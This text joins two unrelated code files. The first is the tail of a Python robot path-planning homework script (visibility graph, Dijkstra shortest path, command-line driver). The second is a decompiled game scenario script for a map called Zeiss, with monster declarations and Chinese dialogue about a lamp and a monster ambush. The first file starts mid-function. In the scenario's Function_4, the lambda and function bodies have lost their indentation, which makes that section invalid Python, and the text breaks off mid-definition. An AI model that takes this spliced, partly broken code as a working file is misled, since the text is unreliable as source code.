            j += 1
        else:
            # Parallel edges: advance both polygons together.
            i += 1
            j += 1
    return Polygon(poly_sum)
def get_visibility_graph(obstacles: List[Polygon], source=None, dest=None) -> List[LineString]:
    """Build the visibility graph of a map.

    Connects every pair of obstacle vertices (plus the optional source and
    destination points) whose straight segment neither enters nor crosses
    any obstacle.

    :param obstacles: obstacles in the map (C-space polygons)
    :param source: optional robot start position (part 2/3 only)
    :param dest: optional query destination (part 3 only)
    :return: the visibility-graph edges as LineStrings
    """
    # All candidate graph nodes: polygon vertices (without the duplicated
    # closing vertex) plus the optional endpoints.
    nodes = [vertex for poly in obstacles for vertex in poly.exterior.coords[:-1]]
    for extra in (source, dest):
        if extra is not None:
            nodes.append(extra)
    edges = []
    # Test every unordered node pair once; keep the segment only if it is
    # collision-free with respect to every obstacle.
    for idx, start_pt in enumerate(nodes):
        for end_pt in nodes[idx + 1:]:
            segment = LineString([start_pt, end_pt])
            blocked = any(segment.within(poly) or segment.crosses(poly)
                          for poly in obstacles)
            if not blocked:
                edges.append(segment)
    return edges
def get_adjacency_list(lines: "List[LineString]") -> "Dict[Tuple, List[Tuple]]":
    """Build an undirected adjacency list from visibility-graph edges.

    Each edge contributes both directions: its first coordinate gains the
    second as a neighbor and vice versa.

    :param lines: edges of the visibility graph (two-point LineStrings)
    :return: mapping from a vertex tuple to the list of its neighbors
    """
    adjacency_list = {}
    for line in lines:
        a, b = line.coords[0], line.coords[1]
        # setdefault replaces the original bare `except:` pattern, which
        # silently swallowed *every* exception, not just the missing key.
        adjacency_list.setdefault(a, []).append(b)
        adjacency_list.setdefault(b, []).append(a)
    return adjacency_list
def construct_path(parent_map: Dict[Tuple, Tuple], goal: Tuple) -> List[Tuple]:
    """Rebuild the start-to-goal path from Dijkstra's parent pointers.

    Walks backwards from *goal* until the start node is reached — the start
    is recognizable because its parent is None.
    """
    chain = []
    node = goal
    while node:
        chain.append(node)
        node = parent_map[node]
    # The walk produced goal -> start; flip it to start -> goal.
    return chain[::-1]
def dijkstra(lines: List[LineString], start: Tuple, goal: Tuple) -> Tuple[List[Tuple], float]:
    """Run Dijkstra's shortest-path search over the visibility-graph edges.

    :param lines: visibility-graph edges connecting start, goal and vertices
    :param start: start node (must appear in the graph)
    :param goal: goal node (must appear in the graph)
    :return: (shortest path as a list of nodes, its total Euclidean cost)
    """
    neighbors = get_adjacency_list(lines)
    # Tentative costs: zero at the start, infinity elsewhere.
    dist = {node: (0.0 if node == start else float('inf')) for node in neighbors}
    parents = {node: None for node in neighbors}
    pending = set(neighbors)
    while pending:
        # O(V) extract-min; adequate for the small graphs of this homework.
        node = min(pending, key=dist.get)
        pending.remove(node)
        base = dist[node]
        for nxt in neighbors[node]:
            candidate = base + float(np.linalg.norm(np.array(node) - np.array(nxt)))
            if candidate < dist[nxt]:
                dist[nxt] = candidate
                parents[nxt] = node
        # Once the goal has been settled, its cost and parents are final.
        if node == goal:
            break
    return construct_path(parents, goal), dist[goal]
def is_valid_file(parser, arg):
    """Fail argument parsing if *arg* is not an existing path.

    Returns the path unchanged on success, so this can also be used
    directly as an argparse ``type=`` callback (the original returned
    None, which would silently discard the value in that usage).

    :param parser: the argparse.ArgumentParser to report the error through
    :param arg: the path to validate
    :return: *arg* when the path exists; otherwise ``parser.error`` exits
    """
    if not os.path.exists(arg):
        parser.error("The file %s does not exist!" % arg)
    return arg
def get_points_and_dist(line):
    """Parse a robot-file line of the form "x,y dist".

    Uses whitespace-agnostic ``str.split()`` instead of ``split(' ')`` so
    trailing newlines, tabs or repeated spaces no longer break parsing.

    :param line: e.g. "1.5,2.0 3.25\\n"
    :return: ((x, y), dist) with all values as floats
    """
    source_str, dist_str = line.split()
    source = tuple(map(float, source_str.split(',')))
    return source, float(dist_str)
if __name__ == '__main__':
    # Command-line driver: parse the robot/obstacles/query files, then run the
    # three homework stages (C-space construction, visibility graph, shortest path).
    parser = argparse.ArgumentParser()
    parser.add_argument("Robot",
                        help="A file that holds the starting position of the robot, and the distance from the center of the robot to any of its vertices")
    parser.add_argument("Obstacles", help="A file that contains the obstacles in the map")
    parser.add_argument("Query", help="A file that contains the ending position for the robot.")
    args = parser.parse_args()
    obstacles = args.Obstacles
    robot = args.Robot
    query = args.Query
    is_valid_file(parser, obstacles)
    is_valid_file(parser, robot)
    is_valid_file(parser, query)
    workspace_obstacles = []
    # Each obstacle line is a space-separated list of "x,y" vertex pairs.
    with open(obstacles, 'r') as f:
        for line in f.readlines():
            points = [tuple(map(float, t.split(','))) for t in line.replace('\n', '').split(' ') if t != '']
            # Ensure that the first vertex is one which has the minimum y-coordinate
            # (get_minkowsky_sum's merge relies on this ordering).
            min_y_ind = np.array(points).argmin(0)[1]
            points = points[min_y_ind:] + points[:min_y_ind]
            workspace_obstacles.append(Polygon(points))
    with open(robot, 'r') as f:
        source, dist = get_points_and_dist(f.readline())
    # step 1: grow every obstacle by the rhombic robot -> C-space obstacles.
    c_space_obstacles = [get_minkowsky_sum(p, dist) for p in workspace_obstacles]
    plotter1 = Plotter()
    plotter1.add_obstacles(workspace_obstacles)
    plotter1.add_c_space_obstacles(c_space_obstacles)
    plotter1.add_robot(source, dist)
    plotter1.show_graph()
    # step 2: visibility graph over the C-space obstacle vertices.
    lines = get_visibility_graph(c_space_obstacles)
    plotter2 = Plotter()
    plotter2.add_obstacles(workspace_obstacles)
    plotter2.add_c_space_obstacles(c_space_obstacles)
    plotter2.add_visibility_graph(lines)
    plotter2.add_robot(source, dist)
    plotter2.show_graph()
    # step 3: add source/dest to the graph and run Dijkstra for the path.
    with open(query, 'r') as f:
        dest = tuple(map(float, f.readline().split(',')))
    lines = get_visibility_graph(c_space_obstacles, source, dest)
    shortest_path, cost = dijkstra(lines, source, dest)
    plotter3 = Plotter()
    plotter3.add_robot(source, dist)
    plotter3.add_obstacles(workspace_obstacles)
    plotter3.add_robot(dest, dist)
    plotter3.add_visibility_graph(lines)
    plotter3.add_shorterst_path(list(shortest_path))
    plotter3.show_graph()
|
from ED6ScenarioHelper import *
def main():
    """Declarative scenario data for map R3401 (a road in the Zeiss region):
    file header, string table, entry point, character chips, NPC/monster/
    event/actor declarations, and the script function table. All values are
    decompiled game data — do not alter them."""
    # Zeiss
    CreateScenaFile(
        FileName = 'R3401 ._SN',
        MapName = 'Zeiss',
        Location = 'R3401.x',
        MapIndex = 1,
        MapDefaultBGM = "ed60030",
        Flags = 0,
        EntryFunctionIndex = 0xFFFF,
        Reserved = 0,
        IncludedScenario = [
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            ''
        ],
    )

    # In-game name table; entries 9-12 are monsters, 13/14 are exit signposts.
    BuildStringList(
        '@FileName',            # 8
        '魔兽',                 # 9
        '魔兽',                 # 10
        '魔兽',                 # 11
        '魔兽',                 # 12
        '艾尔·雷登关所方向',    # 13
        '蔡斯方向',             # 14
        ' ',                    # 15
    )

    DeclEntryPoint(
        Unknown_00 = 0,
        Unknown_04 = 0,
        Unknown_08 = 6000,
        Unknown_0C = 4,
        Unknown_0E = 0,
        Unknown_10 = 0,
        Unknown_14 = 9500,
        Unknown_18 = -10000,
        Unknown_1C = 0,
        Unknown_20 = 0,
        Unknown_24 = 0,
        Unknown_28 = 2800,
        Unknown_2C = 262,
        Unknown_30 = 45,
        Unknown_32 = 0,
        Unknown_34 = 360,
        Unknown_36 = 0,
        Unknown_38 = 0,
        Unknown_3A = 0,
        InitScenaIndex = 0,
        InitFunctionIndex = 0,
        EntryScenaIndex = 0,
        EntryFunctionIndex = 1,
    )

    # Sprite/model sheets referenced by index from the NPC declarations below.
    AddCharChip(
        'ED6_DT09/CH10750 ._CH',            # 00
        'ED6_DT07/CH00160 ._CH',            # 01
        'ED6_DT07/CH00162 ._CH',            # 02
        'ED6_DT07/CH00100 ._CH',            # 03
        'ED6_DT07/CH00101 ._CH',            # 04
        'ED6_DT07/CH00110 ._CH',            # 05
        'ED6_DT07/CH00111 ._CH',            # 06
        'ED6_DT07/CH00102 ._CH',            # 07
        'ED6_DT07/CH00161 ._CH',            # 08
        'ED6_DT09/CH10130 ._CH',            # 09
        'ED6_DT09/CH10131 ._CH',            # 0A
        'ED6_DT09/CH10750 ._CH',            # 0B
        'ED6_DT09/CH10751 ._CH',            # 0C
        'ED6_DT09/CH10760 ._CH',            # 0D
        'ED6_DT09/CH10761 ._CH',            # 0E
        'ED6_DT09/CH10770 ._CH',            # 0F
        'ED6_DT09/CH10771 ._CH',            # 10
    )

    AddCharChipPat(
        'ED6_DT09/CH10750P._CP',            # 00
        'ED6_DT07/CH00160P._CP',            # 01
        'ED6_DT07/CH00162P._CP',            # 02
        'ED6_DT07/CH00100P._CP',            # 03
        'ED6_DT07/CH00101P._CP',            # 04
        'ED6_DT07/CH00110P._CP',            # 05
        'ED6_DT07/CH00111P._CP',            # 06
        'ED6_DT07/CH00102P._CP',            # 07
        'ED6_DT07/CH00161P._CP',            # 08
        'ED6_DT09/CH10130P._CP',            # 09
        'ED6_DT09/CH10131P._CP',            # 0A
        'ED6_DT09/CH10750P._CP',            # 0B
        'ED6_DT09/CH10751P._CP',            # 0C
        'ED6_DT09/CH10760P._CP',            # 0D
        'ED6_DT09/CH10761P._CP',            # 0E
        'ED6_DT09/CH10770P._CP',            # 0F
        'ED6_DT09/CH10771P._CP',            # 10
    )

    # NPC slots (order matches the name table starting at entry 9).
    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 169300,
        Z = 0,
        Y = -27030,
        Direction = 0,
        Unknown2 = 0,
        Unknown3 = 0,
        ChipIndex = 0x0,
        NpcIndex = 0xFF,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 330710,
        Z = 0,
        Y = -37560,
        Direction = 0,
        Unknown2 = 0,
        Unknown3 = 0,
        ChipIndex = 0x0,
        NpcIndex = 0xFF,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    # Field monsters with their battle-table indices.
    DeclMonster(
        X = 257600,
        Z = 70,
        Y = -24310,
        Unknown_0C = 180,
        Unknown_0E = 15,
        Unknown_10 = 1,
        Unknown_11 = 1,
        Unknown_12 = 0xFFFFFFFF,
        BattleIndex = 0x1D3,
        Unknown_18 = 0,
        Unknown_1A = 0,
    )

    DeclMonster(
        X = 286240,
        Z = 20,
        Y = -35830,
        Unknown_0C = 180,
        Unknown_0E = 9,
        Unknown_10 = 1,
        Unknown_11 = 1,
        Unknown_12 = 0xFFFFFFFF,
        BattleIndex = 0x1D1,
        Unknown_18 = 0,
        Unknown_1A = 0,
    )

    # Trigger region wired to scena function 4 (the lamp ambush event).
    DeclEvent(
        X = 222300,
        Y = -1000,
        Z = -28000,
        Range = 217700,
        Unknown_10 = 0x7D0,
        Unknown_14 = 0xFFFF6CBC,
        Unknown_18 = 0x0,
        Unknown_1C = 4,
    )

    # Interactable points: the flickering lamp (function 3) and a second
    # examine spot (function 5, not visible in this chunk).
    DeclActor(
        TriggerX = 199000,
        TriggerZ = 500,
        TriggerY = -22200,
        TriggerRange = 800,
        ActorX = 199000,
        ActorZ = 1500,
        ActorY = -22200,
        Flags = 0x7C,
        TalkScenaIndex = 0,
        TalkFunctionIndex = 3,
        Unknown_22 = 0,
    )

    DeclActor(
        TriggerX = 285640,
        TriggerZ = 0,
        TriggerY = -26290,
        TriggerRange = 1000,
        ActorX = 285640,
        ActorZ = 1000,
        ActorY = -26290,
        Flags = 0x7C,
        TalkScenaIndex = 0,
        TalkFunctionIndex = 5,
        Unknown_22 = 0,
    )

    ScpFunction(
        "Function_0_2B2",          # 00, 0
        "Function_1_2B3",          # 01, 1
        "Function_2_324",          # 02, 2
        "Function_3_4AC",          # 03, 3
        "Function_4_637",          # 04, 4
        "Function_5_1E52",         # 05, 5
    )
# Scena function 0: map init slot — intentionally empty.
def Function_0_2B2(): pass

label("Function_0_2B2")

Return()

# Function_0_2B2 end
# Scena function 1: map-entry setup. Configures the camera/map parameters,
# applies the post-event object state when scenario flag (0xA0, bit 6) is
# set, and spawns the looping ambient effect at the second examine point.
def Function_1_2B3(): pass

label("Function_1_2B3")

OP_16(0x2, 0xFA0, 0x1F018, 0xFFFD9AB8, 0x30038)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 6)), scpexpr(EXPR_END)), "loc_2DA")
OP_71(0x0, 0x4)
OP_72(0x1, 0x4)
OP_64(0x0, 0x1)

label("loc_2DA")

LoadEffect(0x0, "map\\\\mp027_00.eff")
PlayEffect(0x0, 0x0, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1300, 1300, 1300, 0xFF, 0, 0, 0, 0)
Return()

# Function_1_2B3 end
# Scena function 2: idle behavior for the monster NPCs. Draws a random value
# in [0, 13] and dispatches to one of 14 OP_99 calls (presumably animation
# loops with staggered timings — opcode semantics not visible here).
# The trailing always-true Jc jumps straight to the return, so the final
# OP_99/Jump pair after loc_496 is dead code left by the decompiler.
def Function_2_324(): pass

label("Function_2_324")

OP_51(0xFE, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
RunExpression(0x0, (scpexpr(EXPR_RAND), scpexpr(EXPR_PUSH_LONG, 0xE), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_354")
OP_99(0xFE, 0x0, 0x7, 0x672)
Jump("loc_496")

label("loc_354")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_36D")
OP_99(0xFE, 0x1, 0x7, 0x640)
Jump("loc_496")

label("loc_36D")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_386")
OP_99(0xFE, 0x2, 0x7, 0x60E)
Jump("loc_496")

label("loc_386")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_39F")
OP_99(0xFE, 0x3, 0x7, 0x5DC)
Jump("loc_496")

label("loc_39F")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x4), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3B8")
OP_99(0xFE, 0x4, 0x7, 0x5AA)
Jump("loc_496")

label("loc_3B8")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x5), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3D1")
OP_99(0xFE, 0x5, 0x7, 0x578)
Jump("loc_496")

label("loc_3D1")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x6), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_3EA")
OP_99(0xFE, 0x6, 0x7, 0x546)
Jump("loc_496")

label("loc_3EA")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x7), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_403")
OP_99(0xFE, 0x0, 0x7, 0x677)
Jump("loc_496")

label("loc_403")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_41C")
OP_99(0xFE, 0x1, 0x7, 0x645)
Jump("loc_496")

label("loc_41C")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x9), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_435")
OP_99(0xFE, 0x2, 0x7, 0x613)
Jump("loc_496")

label("loc_435")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xA), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_44E")
OP_99(0xFE, 0x3, 0x7, 0x5E1)
Jump("loc_496")

label("loc_44E")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xB), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_467")
OP_99(0xFE, 0x4, 0x7, 0x5AF)
Jump("loc_496")

label("loc_467")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xC), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_480")
OP_99(0xFE, 0x5, 0x7, 0x57D)
Jump("loc_496")

label("loc_480")

Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0xD), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_496")
OP_99(0xFE, 0x6, 0x7, 0x54B)

label("loc_496")

Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_4AB")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("loc_496")

label("loc_4AB")

Return()

# Function_2_324 end
# Scena function 3: examine event for the flickering street lamp (first
# DeclActor). First inspection sets scenario flag 0x504 and plays the long
# dialogue; later inspections play the short variant. The inner branch on
# party value index 0xA selects which character (Estelle vs. Joshua — TODO
# confirm the mapping) delivers the line. Dialogue text is game data; keep
# the Chinese strings and control codes byte-identical.
def Function_3_4AC(): pass

label("Function_3_4AC")

EventBegin(0x0)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5C9")
OP_A2(0x504)
Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_4FE")

ChrTalk(
    0x101,
    (
        "#004F咦……\x01",
        "这个照明灯,是不是有点怪呢?\x02",
    )
)

CloseMessageWindow()
Jump("loc_534")

label("loc_4FE")

ChrTalk(
    0x101,
    (
        "#004F咦……\x01",
        "那个照明灯,是不是有点怪呢?\x02",
    )
)

CloseMessageWindow()

label("loc_534")

ChrTalk(
    0x102,
    (
        "#012F确实是。\x01",
        "应该是有点故障了。\x02\x03",
        "导力器的导力\x01",
        "是可以自动积蓄的,\x01",
        "所以,我想应该不用担心……\x02",
    )
)

CloseMessageWindow()
Jump("loc_634")

label("loc_5C9")

Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0xA), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_600")

ChrTalk(
    0x101,
    "#000F照明灯好像有点怪怪的。\x02",
)

CloseMessageWindow()
Jump("loc_634")

label("loc_600")

ChrTalk(
    0x102,
    (
        "#015F照明灯有点闪烁。\x01",
        "看来有点故障了。\x02",
    )
)

CloseMessageWindow()

label("loc_634")

EventEnd(0x1)
Return()

# Function_3_4AC end
def Function_4_637(): pass
label("Function_4_637")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xA0, 5)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_1E51")
OP_71(0x0, 0x4)
OP_71(0x1, 0x4)
OP_A2(0x506)
EventBegin(0x0)
ClearChrFlags(0x8, 0x80)
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
ClearChrFlags(0xB, 0x80)
SetChrPos(0x8, 197700, 0, -23200, 45)
SetChrPos(0x9, 199000, 0, -24200, 0)
SetChrPos(0xA, 200900, 0, -24200, 315)
SetChrPos(0xB, 200600, 0, -23100, 315)
SetChrFlags(0x8, 0x40)
SetChrFlags(0x9, 0x40)
SetChrFlags(0xA, 0x40)
SetChrFlags(0xB, 0x40)
NpcTalk(
0x8,
"女孩子的声音",
"啊——!\x02",
)
CloseMessageWindow()
OP_20(0x5DC)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
Fade(1000)
OP_6C(45000, 0)
OP_6D(200700, 2000, -24400, 0)
OP_31(0x6, 0x0, 0x12)
OP_B5(0x6, 0x0)
OP_B5(0x6, 0x1)
OP_B5(0x6, 0x5)
OP_B5(0x6, 0x4)
OP_41(0x6, 0xB5)
OP_41(0x6, 0xF4)
OP_41(0x6, 0x112)
OP_41(0x6, 0x2C9, 0x0)
OP_41(0x6, 0x271, 0x1)
OP_41(0x6, 0x262, 0x5)
OP_41(0x6, 0x26B, 0x4)
OP_35(0x6, 0xD2)
OP_36(0x6, 0x104)
AddParty(0x6, 0xFF)
SetChrPos(0x107, 204300, 0, -26400, 270)
OP_0D()
OP_21()
OP_1D(0x56)
SetChrFlags(0x101, 0x1000)
SetChrFlags(0x102, 0x1000)
Sleep(500)
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
NpcTalk(
0x107,
"小女孩",
(
"#065F#2P已、已经聚集了\x01",
"这么多只魔兽啊~……\x02\x03",
"这样下去会坏掉的……\x02\x03",
"既、既然这样的话……\x02",
)
)
CloseMessageWindow()
def lambda_81F():
OP_6B(2600, 2500)
ExitThread()
QueueWorkItem(0x107, 1, lambda_81F)
Sleep(1000)
OP_22(0xD8, 0x0, 0x64)
SetChrChipByIndex(0x107, 2)
OP_51(0x107, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(1000)
Sleep(500)
TurnDirection(0x107, 0xA, 0)
NpcTalk(
0x107,
"小女孩",
"#062F#2P方向OK,仰角20度……\x02",
)
CloseMessageWindow()
Sleep(400)
NpcTalk(
0x107,
"小女孩",
(
"#062F导力填充率30%……\x02\x03",
"#068F……发射!!\x02",
)
)
CloseMessageWindow()
LoadEffect(0x2, "map\\\\mp019_00.eff")
def lambda_901():
OP_94(0x1, 0xFE, 0xB4, 0x1F4, 0x1388, 0x0)
ExitThread()
QueueWorkItem(0x107, 1, lambda_901)
SetChrChipByIndex(0x107, 2)
SetChrPos(0xE, 196500, 1500, -22500, 0)
OP_22(0x1FA, 0x0, 0x64)
PlayEffect(0x2, 0xFF, 0x107, 250, 1000, 250, 0, 0, 0, 1000, 1000, 1000, 0xE, 0, 0, 0, 0)
OP_99(0x107, 0x0, 0x3, 0x7D0)
OP_99(0x107, 0x3, 0x7, 0x7D0)
def lambda_979():
OP_94(0x1, 0xFE, 0x78, 0x384, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_979)
def lambda_98F():
OP_94(0x1, 0xFE, 0xB4, 0x3E8, 0x1388, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_98F)
def lambda_9A5():
OP_94(0x1, 0xFE, 0xE6, 0x2BC, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_9A5)
def lambda_9BB():
OP_94(0x1, 0xFE, 0x5A, 0x1F4, 0xFA0, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_9BB)
Sleep(1000)
WaitChrThread(0x8, 0x1)
def lambda_9DB():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0x8, 1, lambda_9DB)
WaitChrThread(0x9, 0x1)
def lambda_9EE():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0x9, 1, lambda_9EE)
WaitChrThread(0xA, 0x1)
def lambda_A01():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0xA, 1, lambda_A01)
WaitChrThread(0xB, 0x1)
def lambda_A14():
TurnDirection(0xFE, 0x107, 400)
ExitThread()
QueueWorkItem(0xB, 1, lambda_A14)
OP_8C(0x107, 270, 0)
Sleep(400)
NpcTalk(
0x107,
"小女孩",
(
"#062F#2P再、再靠近的话,\x01",
"这次真的会打中你们哦!\x02\x03",
"真、真的哦,我是认真的!\x02",
)
)
CloseMessageWindow()
OP_62(0xA, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(300)
OP_62(0x9, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(100)
OP_62(0xB, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(100)
OP_62(0x8, 0x0, 1700, 0x18, 0x1B, 0xFA, 0x0)
Sleep(200)
Sleep(1000)
def lambda_AE6():
OP_6D(201700, 2000, -25100, 2500)
ExitThread()
QueueWorkItem(0x101, 1, lambda_AE6)
SetChrFlags(0x8, 0x20)
SetChrFlags(0x9, 0x20)
SetChrFlags(0xA, 0x20)
SetChrFlags(0xB, 0x20)
def lambda_B12():
OP_94(0x0, 0xFE, 0x0, 0x12C, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_B12)
OP_63(0xA)
Sleep(300)
def lambda_B30():
OP_94(0x0, 0xFE, 0x0, 0x258, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_B30)
OP_63(0xB)
def lambda_B49():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_B49)
OP_63(0x9)
Sleep(600)
def lambda_B67():
OP_94(0x0, 0xFE, 0x0, 0x320, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_B67)
OP_63(0x8)
SetChrChipByIndex(0x107, 1)
OP_62(0x107, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
Sleep(1700)
NpcTalk(
0x107,
"小女孩",
(
"#065F#2P啊……\x01",
"起、起到反效果了……\x02",
)
)
CloseMessageWindow()
SetChrPos(0x101, 210200, 0, -30000, 0)
SetChrPos(0x102, 209330, 0, -30000, 0)
SetChrFlags(0x102, 0x4)
def lambda_C0F():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_C0F)
Sleep(150)
def lambda_C2A():
OP_94(0x0, 0xFE, 0x0, 0x3E8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_C2A)
def lambda_C40():
OP_94(0x0, 0xFE, 0x0, 0x1F4, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_C40)
Sleep(300)
def lambda_C5B():
OP_94(0x0, 0xFE, 0x0, 0x258, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_C5B)
Sleep(400)
NpcTalk(
0x107,
"小女孩",
"#069F#2P呀……!\x02",
)
OP_9E(0x107, 0x14, 0x0, 0x190, 0xFA0)
CloseMessageWindow()
def lambda_CA6():
OP_94(0x0, 0xA, 0x0, 0x7D0, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_CA6)
SetChrFlags(0x101, 0x1000)
SetChrFlags(0x102, 0x1000)
SetChrChipByIndex(0x101, 4)
SetChrChipByIndex(0x102, 6)
def lambda_CD0():
OP_6B(3160, 1500)
ExitThread()
QueueWorkItem(0x101, 0, lambda_CD0)
def lambda_CE0():
OP_6D(203200, 0, -24900, 1500)
ExitThread()
QueueWorkItem(0x101, 2, lambda_CE0)
def lambda_CF8():
OP_6C(78000, 1200)
ExitThread()
QueueWorkItem(0x102, 2, lambda_CF8)
ChrTalk(
0x101,
"#10A#1P喔喔喔喔喔!\x05\x02",
)
OP_8E(0x101, 0x326F4, 0x0, 0xFFFF9886, 0x2710, 0x0)
def lambda_D32():
OP_8E(0xFE, 0x317B8, 0x0, 0xFFFF952A, 0x2328, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_D32)
def lambda_D4D():
